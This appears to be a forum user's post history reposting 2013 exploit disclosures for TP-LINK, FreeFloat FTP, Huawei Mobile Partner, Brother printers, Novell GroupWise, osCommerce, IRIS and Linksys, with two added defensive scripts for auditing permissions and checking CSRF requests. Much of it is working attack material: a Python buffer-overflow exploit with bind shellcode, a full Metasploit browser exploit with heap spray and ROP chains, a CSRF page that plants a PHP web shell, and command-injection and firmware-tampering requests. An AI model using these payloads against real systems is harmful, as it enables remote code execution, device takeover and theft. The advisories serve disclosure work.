Praetorian503
Everything posted by Praetorian503
-
TP-LINK Admin Panel Multiple CSRF Vulnerabilities

Advisory Name: Multiple Cross Site Request Forgery vulnerabilities in TP-LINK Admin Panel
Internal Cybsec Advisory Id: 2013-0208-Multiple CSRF vulnerabilities in TP-LINK
Vulnerability Class: Cross Site Request Forgery (CSRF)
Release Date: 02/08/2013
Affected Applications: Firmware v3.13.6 Build 110923 Rel.53137n; other versions may also be affected.
Affected Platforms: WR2543ND or any running the vulnerable firmware.
Local / Remote: Remote
Severity: Medium - CVSS: 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N)
Researcher: Juan Manuel Garcia
Vendor Status: Acknowledged / Unpatched
Release Mode: User released
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf

Vulnerability Description:
Multiple Cross Site Request Forgery vulnerabilities were found in TP-LINK Admin Panel, because the application allows authorized users to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Proof of Concepts:
1) New Storage Sharing and FTP Server user:
http://server/userRpm/NasUserAdvRpm.htm?nas_admin_pwd=hacker&nas_admin_confirm_pwd=hacker&nas_admin_authority=1&nas_admin_ftp=1&Modify=1&Save=Save
2) Disable the Router's Stateful Inspection Firewall:
http://server/userRpm/BasicSecurityRpm.htm?stat=983040&Save=Save

Impact:
An affected user may unintentionally execute actions written by an attacker. In addition, an attacker may change router settings or gain unauthorized access.

Vendor Response:
2012-10-10 - Vulnerability is identified.
2012-10-11 - Vendor is contacted.
2012-10-12 - Vulnerability details are sent to vendor.
2012-10-17 - Vendor confirms vulnerability and states "This vulnerability has been escalated to our RD engineer but under current web server framework it is hard to fix. Our engineer team will modify the web server framework to fix this. Currently it is under process but will take time".
2012-10-25 - Cybsec asks the vendor for the planned publication date for the update.
2012-10-26 - Vendor states "I have no detailed schedule yet".
2012-12-12 - Cybsec asks if there are any news regarding the solution of reported vulnerabilities.
2012-12-12 - Vendor states "The fix of this reported vulnerability is not included in the last firmware upgrade because the web server framework change is still under development".
2013-02-01 - Cybsec tells the Vendor that the security advisory will be published on Wednesday February 6.
2013-02-08 - Having received no reply from TP-Link, vulnerability is released.

Contact Information:
For more information regarding the vulnerability feel free to contact the researcher at jmgarcia <at> cybsec <dot> com

About CYBSEC S.A. Security Systems
Since 1996, CYBSEC is engaged exclusively in rendering professional services specialized in Information Security. Their area of services covers Latin America, Spain and over 250 customers are a proof of their professional life. To keep objectivity, CYBSEC S.A. does not represent, neither sell, nor is associated with other software and/or hardware provider companies. Our services are strictly focused on Information Security, protecting our clients from emerging security threats, maintaining their IT deployments available, safe, and reliable. Beyond professional services, CYBSEC is continuously researching new defense and attack techniques and contributing with the security community with high quality information exchange. For more information, please visit www.cybsec.com
(c) 2010 - CYBSEC S.A. Security Systems

Source: TP-LINK Admin Panel Multiple CSRF Vulnerabilities
-
FreeFloat FTP 1.0 Raw Commands Buffer Overflow #!/usr/bin/env python # Exploit Title: FreeFloat FTP raw commands buffer overflow # Date: 10 Feb 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.freefloat.com/ # Version: FreeFloat FTP 1.0 # Tested on: Windows XP Pro SP2, English # # Description: # FreeFloat FTP 1.0 allows an attacker to trigger a buffer overflow and # execute arbitrary code when a long and invalid raw command is sent to it. # import socket, struct, sys if len(sys.argv) < 3: print "usage: %s IP port" % (sys.argv[0]) sys.exit(0) ip = sys.argv[1] port = int(sys.argv[2]) # Bind shellcode generated with msfvenom: # msfvenom -p windows/shell_bind_tcp # -b "\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d" # -e x86/fnstenv_mov # # [*] x86/fnstenv_mov succeeded with size 366 (iteration=1) shellcode = ( "\x6a\x56\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc8" + "\x4c\xab\x8c\x83\xeb\xfc\xe2\xf4\x34\xa4\x22\x8c\xc8\x4c" + "\xcb\x05\x2d\x7d\x79\xe8\x43\x1e\x9b\x07\x9a\x40\x20\xde" + "\xdc\xc7\xd9\xa4\xc7\xfb\xe1\xaa\xf9\xb3\x9a\x4c\x64\x70" + "\xca\xf0\xca\x60\x8b\x4d\x07\x41\xaa\x4b\x2a\xbc\xf9\xdb" + "\x43\x1e\xbb\x07\x8a\x70\xaa\x5c\x43\x0c\xd3\x09\x08\x38" + "\xe1\x8d\x18\x1c\x20\xc4\xd0\xc7\xf3\xac\xc9\x9f\x48\xb0" + "\x81\xc7\x9f\x07\xc9\x9a\x9a\x73\xf9\x8c\x07\x4d\x07\x41" + "\xaa\x4b\xf0\xac\xde\x78\xcb\x31\x53\xb7\xb5\x68\xde\x6e" + "\x90\xc7\xf3\xa8\xc9\x9f\xcd\x07\xc4\x07\x20\xd4\xd4\x4d" + "\x78\x07\xcc\xc7\xaa\x5c\x41\x08\x8f\xa8\x93\x17\xca\xd5" + "\x92\x1d\x54\x6c\x90\x13\xf1\x07\xda\xa7\x2d\xd1\xa0\x7f" + "\x99\x8c\xc8\x24\xdc\xff\xfa\x13\xff\xe4\x84\x3b\x8d\x8b" + "\x37\x99\x13\x1c\xc9\x4c\xab\xa5\x0c\x18\xfb\xe4\xe1\xcc" + "\xc0\x8c\x37\x99\xfb\xdc\x98\x1c\xeb\xdc\x88\x1c\xc3\x66" + "\xc7\x93\x4b\x73\x1d\xc5\x6c\xbd\x13\x1f\xc3\x8e\xc8\x5d" + "\xf7\x05\x2e\x26\xbb\xda\x9f\x24\x69\x57\xff\x2b\x54\x59" + "\x9b\x1b\xc3\x3b\x21\x74\x54\x73\x1d\x1f\xf8\xdb\xa0\x38" + 
"\x47\xb7\x29\xb3\x7e\xdb\x41\x8b\xc3\xf9\xa6\x01\xca\x73" + "\x1d\x24\xc8\xe1\xac\x4c\x22\x6f\x9f\x1b\xfc\xbd\x3e\x26" + "\xb9\xd5\x9e\xae\x56\xea\x0f\x08\x8f\xb0\xc9\x4d\x26\xc8" + "\xec\x5c\x6d\x8c\x8c\x18\xfb\xda\x9e\x1a\xed\xda\x86\x1a" + "\xfd\xdf\x9e\x24\xd2\x40\xf7\xca\x54\x59\x41\xac\xe5\xda" + "\x8e\xb3\x9b\xe4\xc0\xcb\xb6\xec\x37\x99\x10\x7c\x7d\xee" + "\xfd\xe4\x6e\xd9\x16\x11\x37\x99\x97\x8a\xb4\x46\x2b\x77" + "\x28\x39\xae\x37\x8f\x5f\xd9\xe3\xa2\x4c\xf8\x73\x1d\x4c" + "\xab\x8c" ) # EIP overwritten at offset 251 # JMP ESP 7CA58265 SHELL32.DLL, Windows XP Pro SP2, English jmpesp = struct.pack("<I", 0x7CA58265) buf = "\x41" * 251 + jmpesp + "\x90" * 129 + shellcode print "[+] exploiting target %s:%d" % (ip, port) print "[+] try connecting to %s on port 4444" % (ip) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.recv(1024) s.send(buf + "\r\n") Source: FreeFloat FTP 1.0 Raw Commands Buffer Overflow
-
The Huawei Mobile Partner application suffers from having extremely loose access permissions allowing for anyone to replace the files with malicious binaries. Version 23.007.09.00.203 is affected.

1. DESCRIPTION
Huawei Mobile Partner application contains a flaw that may allow an attacker to gain access to unauthorized privileges. The issue is due to the application installing with insecure permissions. This allows a less privileged local attacker or compromised process to replace the original application binary with a malicious application which will be executed by a victim user or upon Mobile Partner application Windows service restart.

2. BACKGROUND
Mobile Partner is a built-in application in Huawei 3G USB modems that allows you to connect to the 3G mobile network for Internet access. It is widely used by many telcos round the world.

3. VERSIONS AFFECTED
Tested version: 23.007.09.00.203.

4. PROOF-OF-CONCEPT/EXPLOIT
//// Tested on Windows
c:\>wmic service get pathname | find "Mobile Partner"
C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe
C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe

c:\>accesschk -q "C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe"
C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe
  RW Everyone
  RW BUILTIN\Users

c:\>accesschk -q "C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe"
C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe
  RW Everyone
  RW BUILTIN\Users

c:\>accesschk -q "C:\Program Files (x86)\Mobile Partner\Mobile Partner.exe"
C:\Program Files (x86)\Mobile Partner\Mobile Partner.exe
  RW Everyone
  RW BUILTIN\Users

/// Tested on Mac
YEHG:MacOS tester$ ls -Rl /Applications/Mobile\ Partner.app/ | grep rwxrwxrwx | grep "\(app\|mobilepartner\)"
-rwxrwxrwx 1 root admin 82496 Oct 6 17:34 mobilepartner
drwxrwxrwx 3 root admin 102 Oct 6 17:34 XStartScreen.app
drwxrwxrwx 3 root admin 102 Oct 6 17:34 LiveUpd.app
drwxrwxrwx 3 root admin 102 Oct 6 17:34 ouc.app

5. SOLUTION
The vendor has not responded to our security report for months. Workaround is to remove WRITE attribute permission on all Mobile Partner executable files for non-administrator and non-system accounts.

6. VENDOR
Huawei Technologies Co.,Ltd

7. CREDIT
Myo Soe, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

8. DISCLOSURE TIME-LINE
2012-10-xx: Contacted the vendor through publicly mentioned emails and forums
2013-02-11: No response
2013-02-11: Vulnerability not fixed
2013-02-11: Vulnerability disclosed

9. REFERENCES
Original Advisory URL: http://core.yehg.net/lab/pr0js/advisories/huawei_mobile_partner-insecure_permission

#yehg [2013-02-11]

Source: PacketStorm
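The workaround in section 5 is to strip write access from every Mobile Partner executable for non-privileged accounts. The following audit is an added example and not the advisory's code: it walks an install directory on a POSIX system (the macOS case above) and reports executables or directories that any user may overwrite, then applies the fix. The fixture directory, the file names inside it and their modes are constructed for the demonstration; on a real system you would point `find_world_writable` at `/Applications/Mobile Partner.app`.

```python
import os
import shutil
import stat
import tempfile


def find_world_writable(root):
    """Return [(relative_path, mode)] for entries any user may overwrite.

    Flags a regular file that is world-writable AND has an execute bit
    (the 'mobilepartner' binary above), or a world-writable directory
    (the '*.app' bundles above), since a writable directory lets an
    attacker replace protected files inside it by rename.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue
            if stat.S_ISLNK(mode):
                continue  # the link target is judged when the walk reaches it
            world_writable = bool(mode & stat.S_IWOTH)
            executable = bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
            if world_writable and (stat.S_ISDIR(mode) or executable):
                findings.append((os.path.relpath(path, root), oct(stat.S_IMODE(mode))))
    return sorted(findings)


def strip_world_write(root):
    """Apply the advisory's workaround: drop the group/other write bits."""
    fixed = []
    for rel, _ in find_world_writable(root):
        path = os.path.join(root, rel)
        mode = stat.S_IMODE(os.lstat(path).st_mode)
        os.chmod(path, mode & ~(stat.S_IWGRP | stat.S_IWOTH))
        fixed.append(rel)
    return fixed


def build_fixture():
    """Constructed layout mirroring the names quoted in the advisory.

    The 'binaries' are empty placeholder files; only the modes matter.
    """
    root = tempfile.mkdtemp(prefix="mobilepartner_")
    layout = {
        "mobilepartner": 0o777,  # world-writable executable: finding
        "ouc.app": None,         # directory set to 0o777 below: finding
        "README.txt": 0o666,     # world-writable but not executable: ignored
        "helper": 0o755,         # correctly protected executable: ignored
    }
    for name, mode in layout.items():
        path = os.path.join(root, name)
        if mode is None:
            os.mkdir(path)
            os.chmod(path, 0o777)
        else:
            open(path, "w").close()
            os.chmod(path, mode)
    return root


def audit_fixture():
    """Run the audit before and after remediation on the constructed tree."""
    root = build_fixture()
    try:
        before = find_world_writable(root)
        strip_world_write(root)
        after = find_world_writable(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)
    return before, after


if __name__ == "__main__":
    before, after = audit_fixture()
    print("before:", before)
    print("after: ", after)
```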
-
Brother HL5370 printers suffer from arbitrary command execution and trivial password guessing.

Tested on Brother HL5370 latest firmware so far, confirmed working against many others by Brother documentation.

From Brother .de website - http://qr.cx/zCt9

Syntax for PJL JOB command includes -
"PASSWORD = password ( HL-1660e/2060/2400C/2400Ce/3400CN/1650/1670N/3260N/2460/7050/1850/1870N/5040/5050/5070N/5140/5150D/5170DN/2600CN/2700CN/3450CN/6050/6050D/6050DN/8050N only )
When the password is set by the DEFAULT command, modifying the NVRAM by using the DEFAULT or INITIALIZE commands is locked with the password. Sending the correct password with this command can unlock this until the EOJ command is executed.
password = 0 to 65,535
Default value = 0
When the printer receives the JOB command, the UEL command is not recognized as a job boundary until an EOJ command is received."

Guessing a 16-bit password is very fast, and the printer does not (or cannot?) slow down password guessing. Worse, the password is easily found or not necessary.

From printer ROM "image" header -
12345X@PJL SUPERUSER PASSWORD=[any 16-bit sign value]
@PJL DEFAULT LANGSELECT=1
@PJL SUPERUSEROFF
@PJL SUPERUSER PASSWORD=[any 16-bit sign value]
@PJL WNVRAMBIT ADDRESS=288161793 DATA=1
@PJL SUPERUSEROFF
@PJL SET PAGEPROTECT=OFF
@PJL ENTER LANGUAGE=PCL
--> binary begins here

Have not tested past uploading arbitrary firmware. This should be enough to worry. Probably no point to Brother network controller supporting https and snmp 3 now... Brother snmp 3 support only short keys anyway.

Source: PacketStorm
-
This Metasploit module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll ActiveX. Several methods in the GWCalServer control use user provided data as a pointer, which allows to read arbitrary memory and execute arbitrary code. This Metasploit module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The JRE6 needs to be installed to achieve ASLR bypass. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "6.0", :ua_maxver => "9.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :rank => NormalRanking, :classid => "{601D7813-408F-11D1-98D7-444553540000}", :method => "SetEngine" }) def initialize(info={}) super(update_info(info, 'Name' => "Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution", 'Description' => %q{ This module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll ActiveX. Several methods in the GWCalServer control use user provided data as a pointer, which allows to read arbitrary memory and execute arbitrary code. This module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The JRE6 needs to be installed to achieve ASLR bypass. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'rgod <rgod[at]autistici.org>', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2012-0439' ], [ 'OSVDB', '89700' ], [ 'BID' , '57658' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-008' ], [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011688' ] ], 'Payload' => { 'BadChars' => "\x00", 'Space' => 1040, 'DisableNops' => true }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # gwcls1.dll 12.0.0.8586 [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ], [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x3e3' } ], [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4' } ], [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x3e3' } ], [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x3e3' } ], [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x3ed' } ]#'0x5fe' } ] ], 'Privileged' => false, 'DisclosureDate' => "Jan 30 2013", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? 
and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) # Land the payload at 0x0c0c0c0c case my_target when targets[7] # IE 9 on Windows 7 js = %Q| function randomblock(blocksize) { var theblock = ""; for (var i = 0; i < blocksize; i++) { theblock += Math.floor(Math.random()*90)+10; } return theblock; } function tounescape(block) { var blocklen = block.length; var unescapestr = ""; for (var i = 0; i < blocklen-1; i=i+4) { unescapestr += "%u" + block.substring(i,i+4); } return unescapestr; } var heap_obj = new heapLib.ie(0x10000); var code = unescape("#{js_code}"); var nops = unescape("#{js_random_nops}"); while (nops.length < 0x80000) nops += nops; var offset_length = #{my_target['Offset']}; for (var i=0; i < 0x1000; i++) { var padding = unescape(tounescape(randomblock(0x1000))); while (padding.length < 0x1000) padding+= padding; var junk_offset = padding.substring(0, offset_length); var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length); while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; sprayblock = single_sprayblock.substring(0, (0x40000-6)/2); heap_obj.alloc(sprayblock); } | else # For IE 6, 7, 8 js = %Q| var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } var 
overflow = nops.substring(0, 10); | end js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end return js end def stack_pivot pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset return pivot end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return [0x0c0c0c10 - 0x426].pack("V") + [0x0c0c0c14].pack("V") + code if t['Rop'].nil? # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea jmp_shell = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{0x0c0c0c14 - 0x0c0c07ea - rop_payload.length}").encode_string rop_payload << jmp_shell rop_payload << rand_text_alpha(0x0c0c0c0c - 0x0c0c07ea- rop_payload.length) rop_payload << [0x0c0c0c10 - 0x426].pack("V") # Mapped at 0x0c0c0c0c # 0x426 => vtable offset rop_payload << [0x77c15ed5].pack("V") # Mapped at 0x0c0c0c10 # xchg eax, esp # ret rop_payload << stack_pivot rop_payload << code else print_status("Using JRE ROP") rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea jmp_shell = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{0x0c0c0c14 - 0x0c0c07ea - rop_payload.length}").encode_string rop_payload << jmp_shell rop_payload << rand_text_alpha(0x0c0c0c0c - 0x0c0c07ea- rop_payload.length) rop_payload << [0x0c0c0c10 - 0x426].pack("V") # Mapped at 0x0c0c0c0c # 0x426 => vtable offset rop_payload << [0x7C348B05].pack("V") # Mapped at 0x0c0c0c10 # xchg eax, esp # ret rop_payload << stack_pivot rop_payload << code end return rop_payload end def load_exploit_html(my_target, cli) p = get_payload(my_target, cli) js = ie_heap_spray(my_target, p) 
trigger = "target.GetNXPItem(\"22/10/2013\", 1, 1);" * 200 html = %Q| <html> <head> <script> #{js} </script> </head> <body> <object classid='clsid:601D7813-408F-11D1-98D7-444553540000' id ='target'> </object> <script> target.SetEngine(0x0c0c0c0c-0x20); setInterval(function(){#{trigger}},1000); </script> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end =begin * Remote Code Exec (240.8d4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\Novell\GROUPW~1\gwenv1.dll - eax=00000000 ebx=0c0c0bec ecx=030c2998 edx=030c2998 esi=0c0c0bec edi=0013df58 eip=10335e2d esp=0013de04 ebp=0013de8c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202 gwenv1!NgwOFErrorEnabledVector<NgwOFAttribute>::SetParent+0x326b9d: 10335e2d 8a8e4f040000 mov cl,byte ptr [esi+44Fh] ds:0023:0c0c103b=?? .text:103BDDEC mov eax, [ebp+var_4] // var_4 => Engine + 0x20 .text:103BDDEF test esi, esi .text:103BDDF1 jnz short loc_103BDE17 .text:103BDDF3 cmp [eax+426h], esi .text:103BDDF9 jz short loc_103BDE17 // Check function pointer against nil? 
.text:103BDDFB mov ecx, [ebp+arg_8] .text:103BDDFE mov edx, [ebp+arg_4] .text:103BDE01 push ecx .text:103BDE02 mov ecx, [eax+42Ah] // Carefully crafted object allows to control it .text:103BDE08 push edx .text:103BDE09 mov edx, [eax+426h] // Carefully crafted object allows to control it .text:103BDE0F push ecx .text:103BDE10 call edx // Win! * Info Leak // Memory disclosure => 4 bytes from an arbitrary address // Unstable when info leaking and triggering rce path... target.SetEngine(0x7ffe0300-0x45c); // Disclosing ntdll var leak = target.GetMiscAccess(); alert(leak); =end Source: PacketStorm
-
osCommerce version 2.3.3 suffers from a cross site request forgery vulnerability.

<?php
/*
 * this is simple proof-of-c0ncept for csrf in latest osCommerce (2.3.3).
 *
 * Admin, after visiting this page, will add php-shell-code to file:
 * ./catalog/includes/languages/english/download.php, so now if we
 * add 'cmd' param to this file, our 'shell' will print command output.
 *
 * --- there should be more this kind of bugs in this webapp.
 * 22.o1.2o13 o/
 */
?>
<html><body onload="document.runCSRF.submit();">
<form method="post" name="runCSRF" action="http://oscommerce-2.3.3/catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save">
<input type="hidden" name="file_contents" value="<?php $cmd = $_GET['cmd']; echo '<pre>' . shell_exec($cmd) . '</pre>'; ?>">
</form>your shell should be here: catalog/includes/languages/english/download.php?cmd=id<br></body></html>

Source: PacketStorm
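The TP-LINK and osCommerce posts above describe the same defect from the server's side: a state-changing request is honoured because the browser attached the victim's session, with nothing proving the request originated from the application's own pages. The checker below is an added example, not code from either advisory or vendor. It enforces the two standard controls: state changes are refused over GET (the TP-LINK pattern, where a plain link or image tag suffices), and a POST must carry a same-site Origin/Referer plus a per-session token (which the osCommerce auto-submitted form cannot supply). `SITE_HOST`, the `STATE_CHANGING` path list and the `csrf_token` field name are assumptions; the request URLs in `demo()` are the ones quoted in the two posts.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_HOST = "oscommerce-2.3.3"  # assumption: hostname the admin panel is served on

# Handlers that change state. Listing them is the application's job; the
# checker only enforces the policy. Paths taken from the two PoCs above.
STATE_CHANGING = {
    "/userRpm/NasUserAdvRpm.htm",
    "/userRpm/BasicSecurityRpm.htm",
    "/catalog/admin/define_language.php",
}


def issue_token():
    """Per-session secret; embed it in every state-changing form as csrf_token."""
    return secrets.token_hex(16)


def check_request(method, url, headers, form, session_token):
    """Return (allowed, reason). headers keys are assumed canonically cased."""
    path = urlsplit(url).path
    if path not in STATE_CHANGING:
        return True, "not state-changing"
    if method != "POST":
        # Rule 1: never change state on GET; the TP-LINK PoCs ride on GET.
        return False, "state change requested over %s" % method
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "no Origin/Referer on a state-changing request"
    source_host = urlsplit(source).hostname
    if source_host != SITE_HOST:
        # Rule 2: the osCommerce page auto-submits from the attacker's host.
        return False, "cross-site source %s" % source_host
    token = form.get("csrf_token", "")
    if not token or not hmac.compare_digest(token, session_token):
        # Rule 3: the attacker's form cannot know the victim's token.
        return False, "missing or wrong csrf_token"
    return True, "ok"


def demo():
    """Run the three request shapes discussed above; returns {label: allowed}."""
    session_token = issue_token()
    tplink = "http://server/userRpm/BasicSecurityRpm.htm?stat=983040&Save=Save"
    osc = ("http://oscommerce-2.3.3/catalog/admin/define_language.php"
           "?lngdir=english&filename=english/download.php&action=save")
    return {
        # TP-LINK PoC 2: firewall disabled via a GET the victim was lured into.
        "tplink_get": check_request(
            "GET", tplink, {"Referer": "http://attacker.example/page.html"},
            {}, session_token)[0],
        # osCommerce PoC: POST auto-submitted from the attacker's page, no token.
        "oscommerce_csrf": check_request(
            "POST", osc, {"Origin": "http://attacker.example"},
            {"file_contents": "<?php ... ?>"}, session_token)[0],
        # Legitimate save from the admin's own page carrying the session token.
        "legit": check_request(
            "POST", osc, {"Origin": "http://oscommerce-2.3.3"},
            {"file_contents": "...", "csrf_token": session_token}, session_token)[0],
        # Read-only page: no proof required.
        "browse": check_request(
            "GET", "http://oscommerce-2.3.3/catalog/index.php", {}, {},
            session_token)[0],
    }


if __name__ == "__main__":
    for label, allowed in demo().items():
        print("%-16s %s" % (label, "allowed" if allowed else "blocked"))
```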
-
IRIS Citations management tool suffers from a remote command execution vulnerability.

A vulnerability exists in IRIS citations management tool which allows a low privileged attacker to execute arbitrary commands. Details can be found on my blog: https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/

PoC:
http://[target]/[path]/index.php?p=add&import=spnro&code=a"+-T+0.1+||echo+`id`+>+/tmp/luls||"

~ aeon

Source: PacketStorm
-
Linksys E1500 and E2500 suffer from cross site request forgery, cross site scripting, remote command injection, and directory traversal vulnerabilities.

Device Name: Linksys E1500 / E2500
Vendor: Linksys

============
Device Description:
============
The Linksys E1500 is a Wireless-N Router with SpeedBoost. It lets you access the Internet via a wireless connection or through one of its four switched ports. You can also use the Linksys E1500 to share resources, such as computers, printers and files. The installation and use of the Linksys E1500 is easy with Cisco Connect, the software that is installed when you run the Setup CD. Likewise, advanced configuration of the Linksys E1500 is available through its web-based setup page.
Source: http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=...

============
Vulnerable Firmware Releases - e1500:
============
Firmware-Version: v1.0.00 - build 9 Feb. 17, 2011
Firmware-Version: v1.0.04 - build 2 Mar. 8, 2012
Firmware-Version: v1.0.05 - build 1 Aug. 23, 2012

============
Vulnerable Firmware Releases - e2500:
============
Firmware Version: v1.0.03 (only tested for known OS command injection)
Other versions may also be affected.

============
Shodan Torks
============
Shodan Search: linksys e1500
Shodan Search: linksys e2500

============
Vulnerability Overview:
============

* OS Command Injection / E1500 and E2500 v1.0.03
=> Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26

The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device. You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Diagnostics.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Connection: close

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip=

Changing the request method from HTTP POST to HTTP GET makes the exploitation easier:
http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-os-command-injection-1.0.05-rooted.png

* Directory traversal - tested on E1500:
=> parameter: next_page

Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.

Request:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
